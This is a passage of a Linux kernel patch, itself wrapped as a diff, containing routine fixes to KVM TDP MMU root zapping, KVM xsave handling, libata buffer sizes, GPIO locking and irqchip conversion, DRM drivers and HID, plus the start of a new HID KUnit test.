+ 
+-#define for_each_tdp_mmu_root_yield_safe(_kvm, _root)			\
+-	for (_root = tdp_mmu_next_root(_kvm, NULL, false, false);		\
++#define for_each_tdp_mmu_root_yield_safe(_kvm, _root, _shared)			\
++	for (_root = tdp_mmu_next_root(_kvm, NULL, _shared, false);		\
+ 	     _root;								\
+-	     _root = tdp_mmu_next_root(_kvm, _root, false, false))		\
+-		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, false)) {		\
++	     _root = tdp_mmu_next_root(_kvm, _root, _shared, false))		\
++		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, _shared)) {		\
+ 		} else
+ 
+ /*
+@@ -305,7 +252,7 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	 * by a memslot update or by the destruction of the VM.  Initialize the
+ 	 * refcount to two; one reference for the vCPU, and one reference for
+ 	 * the TDP MMU itself, which is held until the root is invalidated and
+-	 * is ultimately put by tdp_mmu_zap_root_work().
++	 * is ultimately put by kvm_tdp_mmu_zap_invalidated_roots().
+ 	 */
+ 	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+@@ -963,7 +910,7 @@ bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	for_each_tdp_mmu_root_yield_safe(kvm, root)
++	for_each_tdp_mmu_root_yield_safe(kvm, root, false)
+ 		flush = tdp_mmu_zap_leafs(kvm, root, start, end, true, flush);
+ 
+ 	return flush;
+@@ -985,7 +932,7 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ 	 * is being destroyed or the userspace VMM has exited.  In both cases,
+ 	 * KVM_RUN is unreachable, i.e. no vCPUs will ever service the request.
+ 	 */
+-	for_each_tdp_mmu_root_yield_safe(kvm, root)
++	for_each_tdp_mmu_root_yield_safe(kvm, root, false)
+ 		tdp_mmu_zap_root(kvm, root, false);
+ }
+ 
+@@ -995,18 +942,47 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+  */
+ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ {
+-	flush_workqueue(kvm->arch.tdp_mmu_zap_wq);
++	struct kvm_mmu_page *root;
++
++	read_lock(&kvm->mmu_lock);
++
++	for_each_tdp_mmu_root_yield_safe(kvm, root, true) {
++		if (!root->tdp_mmu_scheduled_root_to_zap)
++			continue;
++
++		root->tdp_mmu_scheduled_root_to_zap = false;
++		KVM_BUG_ON(!root->role.invalid, kvm);
++
++		/*
++		 * A TLB flush is not necessary as KVM performs a local TLB
++		 * flush when allocating a new root (see kvm_mmu_load()), and
++		 * when migrating a vCPU to a different pCPU.  Note, the local
++		 * TLB flush on reuse also invalidates paging-structure-cache
++		 * entries, i.e. TLB entries for intermediate paging structures,
++		 * that may be zapped, as such entries are associated with the
++		 * ASID on both VMX and SVM.
++		 */
++		tdp_mmu_zap_root(kvm, root, true);
++
++		/*
++		 * The referenced needs to be put *after* zapping the root, as
++		 * the root must be reachable by mmu_notifiers while it's being
++		 * zapped
++		 */
++		kvm_tdp_mmu_put_root(kvm, root, true);
++	}
++
++	read_unlock(&kvm->mmu_lock);
+ }
+ 
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously.  Using a separate workqueue makes it
+- * easy to ensure that the destruction is performed before the "fast zap"
+- * completes, without keeping a separate list of invalidated roots; the list is
+- * effectively the list of work items in the workqueue.
++ * zapping is done separately so that it happens with mmu_lock with read,
++ * whereas invalidating roots must be done with mmu_lock held for write (unless
++ * the VM is being destroyed).
+  *
+- * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * Note, kvm_tdp_mmu_zap_invalidated_roots() is gifted the TDP MMU's reference.
+  * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+@@ -1031,19 +1007,20 @@ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ 	/*
+ 	 * As above, mmu_lock isn't held when destroying the VM!  There can't
+ 	 * be other references to @kvm, i.e. nothing else can invalidate roots
+-	 * or be consuming roots, but walking the list of roots does need to be
+-	 * guarded against roots being deleted by the asynchronous zap worker.
++	 * or get/put references to roots.
+ 	 */
+-	rcu_read_lock();
+-
+-	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
++		/*
++		 * Note, invalid roots can outlive a memslot update!  Invalid
++		 * roots must be *zapped* before the memslot update completes,
++		 * but a different task can acquire a reference and keep the
++		 * root alive after its been zapped.
++		 */
+ 		if (!root->role.invalid) {
++			root->tdp_mmu_scheduled_root_to_zap = true;
+ 			root->role.invalid = true;
+-			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
+-
+-	rcu_read_unlock();
+ }
+ 
+ /*
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index d0a9fe0770fdd..c82a8bb321bb9 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -65,7 +65,7 @@ u64 *kvm_tdp_mmu_fast_pf_get_last_sptep(struct kvm_vcpu *vcpu, u64 addr,
+ 					u64 *spte);
+ 
+ #ifdef CONFIG_X86_64
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
++void kvm_mmu_init_tdp_mmu(struct kvm *kvm);
+ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return sp->tdp_mmu_page; }
+ 
+@@ -86,7 +86,7 @@ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+ 	return sp && is_tdp_mmu_page(sp) && sp->root_count;
+ }
+ #else
+-static inline int kvm_mmu_init_tdp_mmu(struct kvm *kvm) { return 0; }
++static inline void kvm_mmu_init_tdp_mmu(struct kvm *kvm) {}
+ static inline void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm) {}
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return false; }
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu) { return false; }
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index d3e66740c7c68..fb125b54ee680 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -542,8 +542,11 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
++	case AVIC_IPI_FAILURE_INVALID_IPI_VECTOR:
++		/* Invalid IPI with vector < 16 */
++		break;
+ 	default:
+-		pr_err("Unknown IPI interception\n");
++		vcpu_unimpl(vcpu, "Unknown avic incomplete IPI interception\n");
+ 	}
+ 
+ 	return 1;
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 8053974af326c..bc288e6bde642 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -1164,6 +1164,9 @@ void svm_leave_nested(struct kvm_vcpu *vcpu)
+ 
+ 		nested_svm_uninit_mmu_context(vcpu);
+ 		vmcb_mark_all_dirty(svm->vmcb);
++
++		if (kvm_apicv_activated(vcpu->kvm))
++			kvm_make_request(KVM_REQ_APICV_UPDATE, vcpu);
+ 	}
+ 
+ 	kvm_clear_request(KVM_REQ_GET_NESTED_STATE_PAGES, vcpu);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 1931d3fcbbe09..4d6baae1ae748 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5301,26 +5301,37 @@ static int kvm_vcpu_ioctl_x86_set_debugregs(struct kvm_vcpu *vcpu,
+ 	return 0;
+ }
+ 
+-static void kvm_vcpu_ioctl_x86_get_xsave(struct kvm_vcpu *vcpu,
+-					 struct kvm_xsave *guest_xsave)
+-{
+-	if (fpstate_is_confidential(&vcpu->arch.guest_fpu))
+-		return;
+-
+-	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu,
+-				       guest_xsave->region,
+-				       sizeof(guest_xsave->region),
+-				       vcpu->arch.pkru);
+-}
+ 
+ static void kvm_vcpu_ioctl_x86_get_xsave2(struct kvm_vcpu *vcpu,
+ 					  u8 *state, unsigned int size)
+ {
++	/*
++	 * Only copy state for features that are enabled for the guest.  The
++	 * state itself isn't problematic, but setting bits in the header for
++	 * features that are supported in *this* host but not exposed to the
++	 * guest can result in KVM_SET_XSAVE failing when live migrating to a
++	 * compatible host without the features that are NOT exposed to the
++	 * guest.
++	 *
++	 * FP+SSE can always be saved/restored via KVM_{G,S}ET_XSAVE, even if
++	 * XSAVE/XCRO are not exposed to the guest, and even if XSAVE isn't
++	 * supported by the host.
++	 */
++	u64 supported_xcr0 = vcpu->arch.guest_supported_xcr0 |
++			     XFEATURE_MASK_FPSSE;
++
+ 	if (fpstate_is_confidential(&vcpu->arch.guest_fpu))
+ 		return;
+ 
+-	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu,
+-				       state, size, vcpu->arch.pkru);
++	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu, state, size,
++				       supported_xcr0, vcpu->arch.pkru);
++}
++
++static void kvm_vcpu_ioctl_x86_get_xsave(struct kvm_vcpu *vcpu,
++					 struct kvm_xsave *guest_xsave)
++{
++	return kvm_vcpu_ioctl_x86_get_xsave2(vcpu, (void *)guest_xsave->region,
++					     sizeof(guest_xsave->region));
+ }
+ 
+ static int kvm_vcpu_ioctl_x86_set_xsave(struct kvm_vcpu *vcpu,
+@@ -12442,9 +12453,7 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = kvm_mmu_init_vm(kvm);
+-	if (ret)
+-		goto out_page_track;
++	kvm_mmu_init_vm(kvm);
+ 
+ 	ret = static_call(kvm_x86_vm_init)(kvm);
+ 	if (ret)
+@@ -12489,7 +12498,6 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 
+ out_uninit_mmu:
+ 	kvm_mmu_uninit_vm(kvm);
+-out_page_track:
+ 	kvm_page_track_cleanup(kvm);
+ out:
+ 	return ret;
+diff --git a/drivers/acpi/irq.c b/drivers/acpi/irq.c
+index c2c786eb95abc..1687483ff319e 100644
+--- a/drivers/acpi/irq.c
++++ b/drivers/acpi/irq.c
+@@ -57,6 +57,7 @@ int acpi_register_gsi(struct device *dev, u32 gsi, int trigger,
+ 		      int polarity)
+ {
+ 	struct irq_fwspec fwspec;
++	unsigned int irq;
+ 
+ 	fwspec.fwnode = acpi_get_gsi_domain_id(gsi);
+ 	if (WARN_ON(!fwspec.fwnode)) {
+@@ -68,7 +69,11 @@ int acpi_register_gsi(struct device *dev, u32 gsi, int trigger,
+ 	fwspec.param[1] = acpi_dev_get_irq_type(trigger, polarity);
+ 	fwspec.param_count = 2;
+ 
+-	return irq_create_fwspec_mapping(&fwspec);
++	irq = irq_create_fwspec_mapping(&fwspec);
++	if (!irq)
++		return -EINVAL;
++
++	return irq;
+ }
+ EXPORT_SYMBOL_GPL(acpi_register_gsi);
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index fbc231a3f7951..fa2fc1953fc26 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -2456,7 +2456,7 @@ static int ata_dev_config_lba(struct ata_device *dev)
+ {
+ 	const u16 *id = dev->id;
+ 	const char *lba_desc;
+-	char ncq_desc[24];
++	char ncq_desc[32];
+ 	int ret;
+ 
+ 	dev->flags |= ATA_DFLAG_LBA;
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 2a04dd36a4948..1eaaf01418ea7 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2247,7 +2247,7 @@ static void ata_eh_link_report(struct ata_link *link)
+ 	struct ata_eh_context *ehc = &link->eh_context;
+ 	struct ata_queued_cmd *qc;
+ 	const char *frozen, *desc;
+-	char tries_buf[6] = "";
++	char tries_buf[16] = "";
+ 	int tag, nr_failed = 0;
+ 
+ 	if (ehc->i.flags & ATA_EHI_QUIET)
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 7de1f27d0323d..df1f78abdf266 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1572,7 +1572,7 @@ static int dev_get_regmap_match(struct device *dev, void *res, void *data)
+ 
+ 	/* If the user didn't specify a name match any */
+ 	if (data)
+-		return !strcmp((*r)->name, data);
++		return (*r)->name && !strcmp((*r)->name, data);
+ 	else
+ 		return 1;
+ }
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index f2062c2a28da8..96d4f48e36011 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -3984,6 +3984,7 @@ static int btusb_probe(struct usb_interface *intf,
+ 
+ 	if (id->driver_info & BTUSB_QCA_ROME) {
+ 		data->setup_on_usb = btusb_setup_qca;
++		hdev->shutdown = btusb_shutdown_qca;
+ 		hdev->set_bdaddr = btusb_set_bdaddr_ath3012;
+ 		hdev->cmd_timeout = btusb_qca_cmd_timeout;
+ 		set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+diff --git a/drivers/bluetooth/hci_vhci.c b/drivers/bluetooth/hci_vhci.c
+index c443c3b0a4da5..4415d850d698b 100644
+--- a/drivers/bluetooth/hci_vhci.c
++++ b/drivers/bluetooth/hci_vhci.c
+@@ -74,7 +74,10 @@ static int vhci_send_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 	struct vhci_data *data = hci_get_drvdata(hdev);
+ 
+ 	memcpy(skb_push(skb, 1), &hci_skb_pkt_type(skb), 1);
++
++	mutex_lock(&data->open_mutex);
+ 	skb_queue_tail(&data->readq, skb);
++	mutex_unlock(&data->open_mutex);
+ 
+ 	wake_up_interruptible(&data->read_wait);
+ 	return 0;
+diff --git a/drivers/gpio/gpio-timberdale.c b/drivers/gpio/gpio-timberdale.c
+index de14949a3fe5a..92c1f2baa4bff 100644
+--- a/drivers/gpio/gpio-timberdale.c
++++ b/drivers/gpio/gpio-timberdale.c
+@@ -43,9 +43,10 @@ static int timbgpio_update_bit(struct gpio_chip *gpio, unsigned index,
+ 	unsigned offset, bool enabled)
+ {
+ 	struct timbgpio *tgpio = gpiochip_get_data(gpio);
++	unsigned long flags;
+ 	u32 reg;
+ 
+-	spin_lock(&tgpio->lock);
++	spin_lock_irqsave(&tgpio->lock, flags);
+ 	reg = ioread32(tgpio->membase + offset);
+ 
+ 	if (enabled)
+@@ -54,7 +55,7 @@ static int timbgpio_update_bit(struct gpio_chip *gpio, unsigned index,
+ 		reg &= ~(1 << index);
+ 
+ 	iowrite32(reg, tgpio->membase + offset);
+-	spin_unlock(&tgpio->lock);
++	spin_unlock_irqrestore(&tgpio->lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index a429176673e7a..314dfaa633857 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -30,7 +30,6 @@ struct fsl_gpio_soc_data {
+ 
+ struct vf610_gpio_port {
+ 	struct gpio_chip gc;
+-	struct irq_chip ic;
+ 	void __iomem *base;
+ 	void __iomem *gpio_base;
+ 	const struct fsl_gpio_soc_data *sdata;
+@@ -128,14 +127,14 @@ static int vf610_gpio_direction_output(struct gpio_chip *chip, unsigned gpio,
+ 	unsigned long mask = BIT(gpio);
+ 	u32 val;
+ 
++	vf610_gpio_set(chip, gpio, value);
++
+ 	if (port->sdata && port->sdata->have_paddr) {
+ 		val = vf610_gpio_readl(port->gpio_base + GPIO_PDDR);
+ 		val |= mask;
+ 		vf610_gpio_writel(val, port->gpio_base + GPIO_PDDR);
+ 	}
+ 
+-	vf610_gpio_set(chip, gpio, value);
+-
+ 	return pinctrl_gpio_direction_output(chip->base + gpio);
+ }
+ 
+@@ -207,20 +206,24 @@ static int vf610_gpio_irq_set_type(struct irq_data *d, u32 type)
+ 
+ static void vf610_gpio_irq_mask(struct irq_data *d)
+ {
+-	struct vf610_gpio_port *port =
+-		gpiochip_get_data(irq_data_get_irq_chip_data(d));
+-	void __iomem *pcr_base = port->base + PORT_PCR(d->hwirq);
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++	struct vf610_gpio_port *port = gpiochip_get_data(gc);
++	irq_hw_number_t gpio_num = irqd_to_hwirq(d);
++	void __iomem *pcr_base = port->base + PORT_PCR(gpio_num);
+ 
+ 	vf610_gpio_writel(0, pcr_base);
++	gpiochip_disable_irq(gc, gpio_num);
+ }
+ 
+ static void vf610_gpio_irq_unmask(struct irq_data *d)
+ {
+-	struct vf610_gpio_port *port =
+-		gpiochip_get_data(irq_data_get_irq_chip_data(d));
+-	void __iomem *pcr_base = port->base + PORT_PCR(d->hwirq);
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++	struct vf610_gpio_port *port = gpiochip_get_data(gc);
++	irq_hw_number_t gpio_num = irqd_to_hwirq(d);
++	void __iomem *pcr_base = port->base + PORT_PCR(gpio_num);
+ 
+-	vf610_gpio_writel(port->irqc[d->hwirq] << PORT_PCR_IRQC_OFFSET,
++	gpiochip_enable_irq(gc, gpio_num);
++	vf610_gpio_writel(port->irqc[gpio_num] << PORT_PCR_IRQC_OFFSET,
+ 			  pcr_base);
+ }
+ 
+@@ -237,6 +240,18 @@ static int vf610_gpio_irq_set_wake(struct irq_data *d, u32 enable)
+ 	return 0;
+ }
+ 
++static const struct irq_chip vf610_irqchip = {
++	.name = "gpio-vf610",
++	.irq_ack = vf610_gpio_irq_ack,
++	.irq_mask = vf610_gpio_irq_mask,
++	.irq_unmask = vf610_gpio_irq_unmask,
++	.irq_set_type = vf610_gpio_irq_set_type,
++	.irq_set_wake = vf610_gpio_irq_set_wake,
++	.flags = IRQCHIP_IMMUTABLE | IRQCHIP_MASK_ON_SUSPEND
++			| IRQCHIP_ENABLE_WAKEUP_ON_SUSPEND,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static void vf610_gpio_disable_clk(void *data)
+ {
+ 	clk_disable_unprepare(data);
+@@ -249,7 +264,6 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	struct vf610_gpio_port *port;
+ 	struct gpio_chip *gc;
+ 	struct gpio_irq_chip *girq;
+-	struct irq_chip *ic;
+ 	int i;
+ 	int ret;
+ 
+@@ -315,14 +329,6 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	gc->direction_output = vf610_gpio_direction_output;
+ 	gc->set = vf610_gpio_set;
+ 
+-	ic = &port->ic;
+-	ic->name = "gpio-vf610";
+-	ic->irq_ack = vf610_gpio_irq_ack;
+-	ic->irq_mask = vf610_gpio_irq_mask;
+-	ic->irq_unmask = vf610_gpio_irq_unmask;
+-	ic->irq_set_type = vf610_gpio_irq_set_type;
+-	ic->irq_set_wake = vf610_gpio_irq_set_wake;
+-
+ 	/* Mask all GPIO interrupts */
+ 	for (i = 0; i < gc->ngpio; i++)
+ 		vf610_gpio_writel(0, port->base + PORT_PCR(i));
+@@ -331,7 +337,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	vf610_gpio_writel(~0, port->base + PORT_ISFR);
+ 
+ 	girq = &gc->irq;
+-	girq->chip = ic;
++	gpio_irq_chip_set_chip(girq, &vf610_irqchip);
+ 	girq->parent_handler = vf610_gpio_irq_handler;
+ 	girq->num_parents = 1;
+ 	girq->parents = devm_kcalloc(&pdev->dev, 1,
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 8472013ff38a2..0e78437c8389d 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -1991,6 +1991,7 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
+ 		case IP_VERSION(11, 0, 0):
+ 		case IP_VERSION(11, 0, 1):
+ 		case IP_VERSION(11, 0, 2):
++		case IP_VERSION(11, 0, 3):
+ 			*states = ATTR_STATE_SUPPORTED;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index b89f7f7ca1885..1b5c27ed27370 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -673,7 +673,7 @@ static struct ti_sn65dsi86 *bridge_to_ti_sn65dsi86(struct drm_bridge *bridge)
+ 	return container_of(bridge, struct ti_sn65dsi86, bridge);
+ }
+ 
+-static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
++static int ti_sn_attach_host(struct auxiliary_device *adev, struct ti_sn65dsi86 *pdata)
+ {
+ 	int val;
+ 	struct mipi_dsi_host *host;
+@@ -688,7 +688,7 @@ static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
+ 	if (!host)
+ 		return -EPROBE_DEFER;
+ 
+-	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
++	dsi = devm_mipi_dsi_device_register_full(&adev->dev, host, &info);
+ 	if (IS_ERR(dsi))
+ 		return PTR_ERR(dsi);
+ 
+@@ -706,7 +706,7 @@ static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
+ 
+ 	pdata->dsi = dsi;
+ 
+-	return devm_mipi_dsi_attach(dev, dsi);
++	return devm_mipi_dsi_attach(&adev->dev, dsi);
+ }
+ 
+ static int ti_sn_bridge_attach(struct drm_bridge *bridge,
+@@ -1279,9 +1279,9 @@ static int ti_sn_bridge_probe(struct auxiliary_device *adev,
+ 	struct device_node *np = pdata->dev->of_node;
+ 	int ret;
+ 
+-	pdata->next_bridge = devm_drm_of_get_bridge(pdata->dev, np, 1, 0);
++	pdata->next_bridge = devm_drm_of_get_bridge(&adev->dev, np, 1, 0);
+ 	if (IS_ERR(pdata->next_bridge))
+-		return dev_err_probe(pdata->dev, PTR_ERR(pdata->next_bridge),
++		return dev_err_probe(&adev->dev, PTR_ERR(pdata->next_bridge),
+ 				     "failed to create panel bridge\n");
+ 
+ 	ti_sn_bridge_parse_lanes(pdata, np);
+@@ -1300,9 +1300,9 @@ static int ti_sn_bridge_probe(struct auxiliary_device *adev,
+ 
+ 	drm_bridge_add(&pdata->bridge);
+ 
+-	ret = ti_sn_attach_host(pdata);
++	ret = ti_sn_attach_host(adev, pdata);
+ 	if (ret) {
+-		dev_err_probe(pdata->dev, ret, "failed to attach dsi host\n");
++		dev_err_probe(&adev->dev, ret, "failed to attach dsi host\n");
+ 		goto err_remove_bridge;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 0cb646cb04ee1..d5c15292ae937 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -38,6 +38,14 @@ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data gpd_onemix2s = {
++	.width = 1200,
++	.height = 1920,
++	.bios_dates = (const char * const []){ "05/21/2018", "10/26/2018",
++		"03/04/2019", NULL },
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data gpd_pocket = {
+ 	.width = 1200,
+ 	.height = 1920,
+@@ -401,6 +409,14 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "LTH17"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* One Mix 2S (generic strings, also match on bios date) */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Default string"),
++		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "Default string"),
++		  DMI_EXACT_MATCH(DMI_BOARD_NAME, "Default string"),
++		},
++		.driver_data = (void *)&gpd_onemix2s,
+ 	},
+ 	{}
+ };
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index d445e2d63c9c8..d7e30d889a5ca 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -235,6 +235,7 @@ static vm_fault_t i915_error_to_vmf_fault(int err)
+ 	case 0:
+ 	case -EAGAIN:
+ 	case -ENOSPC: /* transient failure to evict? */
++	case -ENOBUFS: /* temporarily out of fences? */
+ 	case -ERESTARTSYS:
+ 	case -EINTR:
+ 	case -EBUSY:
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 1d0374a577a5e..fb4f0e336b60e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -234,6 +234,7 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 	npages = obj->size >> PAGE_SHIFT;
+ 	mtk_gem->pages = kcalloc(npages, sizeof(*mtk_gem->pages), GFP_KERNEL);
+ 	if (!mtk_gem->pages) {
++		sg_free_table(sgt);
+ 		kfree(sgt);
+ 		return -ENOMEM;
+ 	}
+@@ -243,12 +244,15 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 	mtk_gem->kvaddr = vmap(mtk_gem->pages, npages, VM_MAP,
+ 			       pgprot_writecombine(PAGE_KERNEL));
+ 	if (!mtk_gem->kvaddr) {
++		sg_free_table(sgt);
+ 		kfree(sgt);
+ 		kfree(mtk_gem->pages);
+ 		return -ENOMEM;
+ 	}
+-out:
++	sg_free_table(sgt);
+ 	kfree(sgt);
++
++out:
+ 	iosys_map_set_vaddr(map, mtk_gem->kvaddr);
+ 
+ 	return 0;
+diff --git a/drivers/hid/.kunitconfig b/drivers/hid/.kunitconfig
+index 04daeff5c970e..675a8209c7aeb 100644
+--- a/drivers/hid/.kunitconfig
++++ b/drivers/hid/.kunitconfig
+@@ -1,5 +1,6 @@
+ CONFIG_KUNIT=y
+ CONFIG_USB=y
+ CONFIG_USB_HID=y
++CONFIG_HID_BATTERY_STRENGTH=y
+ CONFIG_HID_UCLOGIC=y
+ CONFIG_HID_KUNIT_TEST=y
+diff --git a/drivers/hid/Kconfig b/drivers/hid/Kconfig
+index c1873ccc7248d..9ad5e43d9961b 100644
+--- a/drivers/hid/Kconfig
++++ b/drivers/hid/Kconfig
+@@ -1263,6 +1263,7 @@ config HID_MCP2221
+ config HID_KUNIT_TEST
+ 	tristate "KUnit tests for HID" if !KUNIT_ALL_TESTS
+ 	depends on KUNIT
++	depends on HID_BATTERY_STRENGTH
+ 	depends on HID_UCLOGIC
+ 	default KUNIT_ALL_TESTS
+ 	help
+diff --git a/drivers/hid/hid-holtek-kbd.c b/drivers/hid/hid-holtek-kbd.c
+index 403506b9697e7..b346d68a06f5a 100644
+--- a/drivers/hid/hid-holtek-kbd.c
++++ b/drivers/hid/hid-holtek-kbd.c
+@@ -130,6 +130,10 @@ static int holtek_kbd_input_event(struct input_dev *dev, unsigned int type,
+ 		return -ENODEV;
+ 
+ 	boot_hid = usb_get_intfdata(boot_interface);
++	if (list_empty(&boot_hid->inputs)) {
++		hid_err(hid, "no inputs found\n");
++		return -ENODEV;
++	}
+ 	boot_hid_input = list_first_entry(&boot_hid->inputs,
+ 		struct hid_input, list);
+ 
+diff --git a/drivers/hid/hid-input-test.c b/drivers/hid/hid-input-test.c
+new file mode 100644
+index 0000000000000..77c2d45ac62a7
+--- /dev/null
++++ b/drivers/hid/hid-input-test.c
+@@ -0,0 +1,80 @@
++// SPDX-License-Identifier: GPL-2.0+
++/*
++ *  HID to Linux Input mapping
++ *
++ *  Copyright (c) 2022 José Expósito <jose.exposito89@gmail.com>
++ */
++
++#include <kunit/test.h>
++
++static void hid_test_input_set_battery_charge_status(struct kunit *test)
++{
++	struct hid_device *dev;
++	bool handled;
++
++	dev = kunit_kzalloc(test, sizeof(*dev), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, dev);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_DG_HEIGHT, 0);
++	KUNIT_EXPECT_FALSE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_UNKNOWN);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_BAT_CHARGING, 0);
++	KUNIT_EXPECT_TRUE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_DISCHARGING);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_BAT_CHARGING, 1);
